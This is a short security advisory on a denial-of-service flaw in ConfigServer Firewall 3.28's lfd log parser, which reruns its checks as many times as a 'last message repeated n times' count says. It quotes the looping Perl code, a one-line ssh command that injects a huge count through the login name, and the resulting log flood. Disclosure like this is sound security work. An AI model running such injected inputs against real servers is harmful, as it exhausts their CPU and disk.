CSF 3.28 - remote, unauthenticated users can cause prolonged, excessive CPU, disk I/O, and disk space usage, severely degrading server performance
DESCRIPTION
lfd in ConfigServer Firewall 3.28 has a subroutine called dochecks() which examines log files for various patterns of undesirable behavior. If a log line contains the string "last message repeated n times" (where "n" is 1 or more numbers), the dochecks() subroutine will be executed "n" times.
The logic looks similar to this:
521 for my $log_line ( @logs ) { 522 if ( $line and $log_line =~ /last message repeated (\d+) times/ ) { 523 for ( 1 .. $1 ) { 524 do_checks( $line, $logfile ); 525 } 526 } 527 }
A remote user can cause the dochecks() subroutine to be ran as many times as they'd like by injecting the "last message repeated" string into one of the monitored log files.
The following steps can be used to take advantage of this issue:
[user@host ~]$ ssh -l 'last message repeated 999999999999999999999999999999999999999 times' victim
The following will be written to /var/log/lfd.log over and over:
Sat May 17 20:57:21 2008 lfd: Failed SSH login from x.x.x.x - 1 failure(s) in the last 20 secs Sat May 17 20:57:21 2008 lfd: Failed SSH login from x.x.x.x - 2 failure(s) in the last 20 secs Sat May 17 20:57:21 2008 lfd: Failed SSH login from x.x.x.x - 3 failure(s) in the last 20 secs Sat May 17 20:57:21 2008 lfd: Failed SSH login from x.x.x.x - 4 failure(s) in the last 20 secs Sat May 17 20:57:21 2008 lfd: Failed SSH login from x.x.x.x - 5 failure(s) in the last 20 secs Sat May 17 20:57:21 2008 lfd: 5 login failures from x.x.x.x within the last 20 seconds - already blocked
This will cause lfd.pl to gradually consume more and more CPU. lfd.log can grow at speeds of 1MB/s or more, depending on the server environment and activity. This was also presumed to work via ftpd, but no other daemons were tested.
IMPACT
Remote, unauthenticated users can severely degrade server performance, possibly filling the disk.